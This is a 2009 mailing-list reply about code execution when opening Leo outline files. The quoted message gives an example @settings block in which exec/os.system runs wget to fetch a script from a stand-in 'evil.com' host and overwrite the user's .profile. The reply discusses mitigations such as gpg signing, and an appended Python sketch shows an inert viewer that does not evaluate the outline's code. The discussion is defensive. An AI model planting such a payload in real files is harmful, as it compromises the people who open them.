On Mon, Jul 6, 2009 at 10:25 PM, thyrsus<[email protected]> wrote:

> Before we implement this as documented, suppose I clicked on the
> attachment someone sent me (Hey!  It claimed it was from
> [email protected]!) containing a leo file with
>
> @settings
>   @if exec('import os; os.system("wget -O $HOME/.profile
> http://www.evil.com/spam_the_world.sh")')
>     @bool fubar=True

We also have {{ }} for evaluating paths that can execute arbitrary
code. I suppose there is no way to make a leo file "safe" - opening a
leo file could be considered equivalent to running a script on your
computer.

Signing leo docs with gpg could be a decent cop-out...

Or implementing a dumb "leo viewer" that parsed the sax, read in the
external files, and did nothing more.

-- 
Ville M. Vainio
http://tinyurl.com/vainio
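
A sketch of the "dumb leo viewer" idea from the message above, as an added example that is not Leo's code or anything posted in this thread: it walks the outline with SAX and lists headlines, marking the `@if` and `{{ }}` forms without evaluating them. The sample outline, the `InertOutline` and `view` names, and the simplified `<v>`/`<vh>` layout are assumptions constructed for illustration, and reading external files is left out.

```python
import io
import re
import xml.sax
from xml.sax.handler import feature_external_ges

# Constructed sample outline (hypothetical content, harmless expressions).
SAMPLE = b"""<leo_file><vnodes>
<v t="n1"><vh>@settings</vh>
<v t="n2"><vh>@if exec('print(1)')</vh>
<v t="n3"><vh>@bool fubar=True</vh></v></v></v>
<v t="n4"><vh>@file {{os.getcwd()}}/notes.txt</vh></v>
</vnodes></leo_file>"""

# Headline forms the thread identifies as code-evaluating: @if and {{ }}.
RISKY = re.compile(r"^@if\b|\{\{.*\}\}")

class InertOutline(xml.sax.ContentHandler):
    """Collects (depth, headline, risky) tuples; nothing is ever evaluated."""
    def __init__(self):
        super().__init__()
        self.depth, self.buf, self.nodes = 0, None, []
    def startElement(self, name, attrs):
        if name == "v":
            self.depth += 1
        elif name == "vh":
            self.buf = []
    def characters(self, content):
        if self.buf is not None:
            self.buf.append(content)
    def endElement(self, name):
        if name == "vh":
            head = "".join(self.buf)
            self.nodes.append((self.depth, head, bool(RISKY.search(head))))
            self.buf = None
        elif name == "v":
            self.depth -= 1

def view(data):
    parser = xml.sax.make_parser()
    # Do not fetch external entities while parsing an untrusted file.
    parser.setFeature(feature_external_ges, False)
    handler = InertOutline()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(data))
    return handler.nodes

if __name__ == "__main__":
    for depth, head, risky in view(SAMPLE):
        print("  " * (depth - 1) + head + ("   [not evaluated]" if risky else ""))
```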
